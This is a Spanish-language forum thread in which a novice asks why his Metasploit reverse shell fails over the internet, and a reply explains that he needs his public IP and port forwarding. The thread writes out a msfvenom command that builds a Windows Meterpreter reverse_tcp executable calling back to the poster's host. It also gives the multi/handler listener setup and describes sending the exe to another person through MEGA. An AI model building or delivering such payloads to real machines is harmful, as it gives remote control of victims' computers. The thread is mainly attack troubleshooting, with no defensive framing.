[SOLUCIONADO] ¿ Como conseguir shell reversa ?

Iniciado por Prometheus, Julio 16, 2017, 06:45:15 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 16, 2017, 06:45:15 PM Ultima modificación: Julio 16, 2017, 09:27:03 PM por xyz
Hola amigos, tengo una enorme duda, y es que estos días he intentado hacer una prueba de ataque fuera de LAN con un amigo, la cosa es que el al abrir el archivo no se me genera una sesión en Meterpreter

El payload lo hago con msfvenom
Código: text
msfvenom -p windows/meterpreter/reverse_tcp LHOST=mi no-ip LPORT=443 R > app.exe


Mi compañia es VTR y mi router es ARRIS, tengo el firewall activado y el puerto 443 abierto con mi IP Local. (no se si hay que abrir otro puerto, soy muy nuevo en esto.

Luego le paso el .exe a mi amigo por MEGA

En msfconsole pongo:
Código: text
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST: mi IP Local (si pongo la no-ip me da error y me la cambia por 0.0.0.0)
set LPORT: 443
exploit


luego mi amigo abre el .exe pero nunca se inicia una sesion por lo que no tengo control de su maquina.
otro dato es que en LHOST pongo mi ip de eth0 ya que la de wlan0 no me sale porque no tengo adaptador, no se si eso influya.

Por favor denme recomendaciones o simplemente diganme que hago mal, Gracias de antemano  ;)

supongo que si has puesto tu direccion de eth0 habras puesto la privada dentro de tu lan ejemplo 192.168.... cuando deberias poner tu ip publica (la de tu router hacia el exterior) y luego hacer port forwarding. yo te recomiendo que estudies un poco de redes y de todos los campos en general antes de chatarrear. Si no pierde la gracia o eso pienso yo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta